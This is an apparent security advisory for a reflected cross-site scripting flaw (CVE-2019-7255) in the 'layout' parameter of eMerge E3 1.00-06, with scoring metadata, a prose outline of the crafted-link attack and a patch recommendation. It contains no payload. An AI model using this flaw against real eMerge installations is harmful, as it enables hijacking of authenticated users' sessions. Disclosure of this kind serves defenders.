Vendor: eMerge E3
By: LiquidWorm
CVSS: 6.1 (MEDIUM)
CWE: 79 (Reflected Cross-Site Scripting)
Product Name: eMerge E3
Affected Version From: 1.00-06
Affected Version To: 1.00-06
Patch Exists: Yes
Related CVE: CVE-2019-7255
CPE: a:linear_solutions:emerge_e3:1.00-06
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: NA
2018
eMerge E3 1.00-06 – ‘layout’ Reflected Cross-Site Scripting
eMerge E3 1.00-06 is vulnerable to Reflected Cross-Site Scripting (XSS) through the 'layout' parameter, which accepts JavaScript code supplied in the request. An attacker can exploit this vulnerability by tricking an authenticated user into clicking a crafted link that carries the JavaScript code in the 'layout' parameter. When the user clicks the link, the code is executed in the user's browser.
Mitigation:
The vendor has released a patch to address this vulnerability. Users should update to the latest version of the software.